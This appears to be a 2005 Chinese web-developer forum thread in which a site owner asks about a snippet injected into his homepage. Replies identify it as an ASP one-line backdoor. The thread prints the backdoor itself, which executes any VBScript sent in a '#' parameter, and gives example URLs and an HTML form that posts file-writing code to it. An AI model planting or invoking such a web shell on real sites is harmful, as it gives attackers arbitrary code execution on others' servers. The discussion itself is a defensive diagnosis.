28,406
社区成员
发帖
与我相关
我的任务
分享这段代码什么意思?我的网站首页被改。
首页上加了一句
<script language=vbscript runat=server>If Request("#")<>"" Then Session("#")=Request("#")
If Session("#")<>"" Then Execute(Session("#"))</script>
<script language=vbscript runat=server>If Request("#")<>"" Then Session("#")=Request("#")
If Session("#")<>"" Then Execute(Session("#"))</script>
...全文
请发表友善的回复…
发表回复
hzw66 2005-05-16
- 打赏
- 举报
用iuhxq(小灰)的方法更自由
get方式字串长度有限,做不了大事
post方式就可以为所欲为了
get方式字串长度有限,做不了大事
post方式就可以为所欲为了
hzw66 2005-05-16
- 打赏
- 举报
很明显的后门程序,可以执行任意asp代码
用法为:xxx.asp??%23=response.write%20"abc"
用法为:xxx.asp??%23=response.write%20"abc"
ASP0000 2005-05-16
- 打赏
- 举报
高手,写木马的更是高手!
cacu 2005-05-16
- 打赏
- 举报
了解
webassassin 2005-04-28
- 打赏
- 举报
.
pkliwei 2005-04-28
- 打赏
- 举报
mark
cacu 2005-04-28
- 打赏
- 举报
顶
sjjf 2005-04-28
- 打赏
- 举报
哦,原来asp的name的值可以用 #的,我还以为不能用呢
iuhxq 2005-04-28
- 打赏
- 举报
假设你的首页是index.asp
看下面的代码
<form method=post action="index.asp">
<textarea name="#" rows="20" cols="80">
Set fso = CreateObject("Scripting.FileSystemObject")
Set f1 = fso.OpenTextFile(server.mappath("./a.txt"), 2, true)
f1.Write("content")
f1.Close
set fso = nothing
</textarea>
<br><input type="submit">
</form>
看下面的代码
<form method=post action="index.asp">
<textarea name="#" rows="20" cols="80">
Set fso = CreateObject("Scripting.FileSystemObject")
Set f1 = fso.OpenTextFile(server.mappath("./a.txt"), 2, true)
f1.Write("content")
f1.Close
set fso = nothing
</textarea>
<br><input type="submit">
</form>
sjjf 2005-04-28
- 打赏
- 举报
呵呵,把自己的网站的安全功夫做好,就不会给人有机可乘了。
iuhxq 2005-04-28
- 打赏
- 举报
顶天木马的后门程序
caiziniu 2005-04-28
- 打赏
- 举报
是的
_______________________________________________________________________________
回复人: Hozaka(空虚的狼) ( 这样别人通过 xxx.asp?#=ABC 的地址就能执行 ABC 了
_______________________________________________________________________________
我觉得这位高手的另一目的在于改你的Session。这样他Session的验证就对他没作用了。他可以随便看你加密过的网页了。
小心哪,你知道这位高手是谁吗?
_______________________________________________________________________________
回复人: Hozaka(空虚的狼) ( 这样别人通过 xxx.asp?#=ABC 的地址就能执行 ABC 了
_______________________________________________________________________________
我觉得这位高手的另一目的在于改你的Session。这样他Session的验证就对他没作用了。他可以随便看你加密过的网页了。
小心哪,你知道这位高手是谁吗?
Hozaka 2005-04-28
- 打赏
- 举报
这样别人通过 xxx.asp?#=ABC 的地址就能执行 ABC 了
sjjf 2005-04-28
- 打赏
- 举报
没什么意思,人家给你传了一个 # 的名字的 控件 或者 是参数 #=xxxxx
这样你的服务端就能够执行上传来的代码了。
不过 好像变量命名 不能有 # 吧? 应该是参数中传入来的
比如
xxx.asp?#=response.write("i_can_exec_it")
这样你的服务端就能够执行上传来的代码了。
不过 好像变量命名 不能有 # 吧? 应该是参数中传入来的
比如
xxx.asp?#=response.write("i_can_exec_it")
szjq 2005-04-28
- 打赏
- 举报
上面的代码没什么意思,你可能没有贴完全代码,看看有什么iframe之类的标记
蛋蛋 2005-04-28
- 打赏
- 举报
照字面上的意思好像没什么!
